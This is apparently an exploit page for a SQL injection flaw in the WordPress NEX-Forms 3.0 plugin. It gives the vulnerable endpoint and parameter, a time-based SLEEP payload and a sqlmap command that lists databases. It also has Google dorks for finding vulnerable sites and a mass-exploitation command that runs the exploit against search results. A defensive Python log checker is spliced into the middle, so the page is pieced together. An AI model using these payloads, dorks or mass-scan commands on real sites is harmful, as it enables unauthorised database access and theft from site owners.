
WordPress-NEX-Forms-3.0-SQL-Injection-Vulnerability


MINI 3xplo1t-SqlMap - WordPress NEX-Forms 3.0 SQL Injection Vulnerability

  # SCRIPT AUTHOR: Cleiton Pinheiro / Nick: googleINURL
  # Email:         [email protected]
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil
  # Who Discovered http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
  # Vulnerability discovered by: Claudio Viviani
  • VENDOR

https://wordpress.org/plugins/nex-forms-express-wp-form-builder/

  • Vulnerability Description

The "submit_nex_form" AJAX function is affected by a SQL injection vulnerability.

  • Tool Description

An automation script that explores targets with the help of the SqlMap tool. SqlMap command executed:

{$params['folder']} -u '{$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1' 
  --technique=B -p nex_forms_Id --dbms mysql {$params['proxy']} --random-agent 
  --answers='follow=N' --dbs --batch --time-sec 10 --level 2  --risk 1
  • GET VULN

SQL can be injected through the following GET parameter:

GET VULN:     nex_forms_Id=(id)
$nex_forms_Id=intval($_REQUEST['nex_forms_Id'])
Ex: http://target.us/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1
  • XPL inject DBMS: 'MySQL'

Exploit:  AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
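
An added example, not part of the original script or the plugin: a log check a site owner could run to find requests to the `submit_nex_form` action whose `nex_forms_Id` is not a plain integer. The log lines are constructed samples in combined log format, and the function and variable names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Apr/2015:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1 HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.9 - - [21/Apr/2015:10:00:07 +0000] "GET /wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(10)))NdbE) HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.9 - - [21/Apr/2015:10:00:30 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 5 "-" "Mozilla/5.0"
198.51.100.7 - - [21/Apr/2015:10:01:02 +0000] "GET /index.php?nex_forms_Id=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# client IP, timestamp, method and request target of one log line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"')


def suspicious_requests(log_text):
    """Return (client_ip, timestamp, decoded_value) for every submit_nex_form
    request whose nex_forms_Id is not a plain decimal integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        ip, ts, _method, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        # parse_qs URL-decodes the values, so encoded payloads are compared decoded
        qs = parse_qs(url.query, keep_blank_values=True)
        if "submit_nex_form" not in qs.get("action", []):
            continue
        for value in qs.get("nex_forms_Id", []):
            if not re.fullmatch(r"[0-9]+", value):
                hits.append((ip, ts, value))
    return hits


if __name__ == "__main__":
    for ip, ts, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ts} {ip} nex_forms_Id={value!r}")
```

Access logs record only the query string; because the parameter is read from `$_REQUEST`, a value sent in a POST body needs request-body logging or a WAF rule to be seen.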
  • GOOGLE DORK

inurl:nex-forms-express-wp-form-builder
index of nex-forms-express-wp-form-builde
  • COMMAND --help:

    -t : SET TARGET.
    -f : SET FILE TARGETS.
    -p : SET PROXY
    Execute:
                  php wp3xplo1t.php -t target
                  php wp3xplo1t.php -f targets.txt
                  php wp3xplo1t.php -t target -p 'http://localhost:9090'
  • EXPLOIT MASS USE SCANNER INURLBR

./inurlbr.php --dork 'inurl:nex-forms-express-wp-form-builder' -s wp3xplo1t.txt -q 1,6 --comand-vul "php wp3xplo1t.php -t '_TARGET_'"
  • DOWNLOAD INURLBR

https://github.com/googleinurl/SCANNER-INURLBR

  • REFERENCE

[1] http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
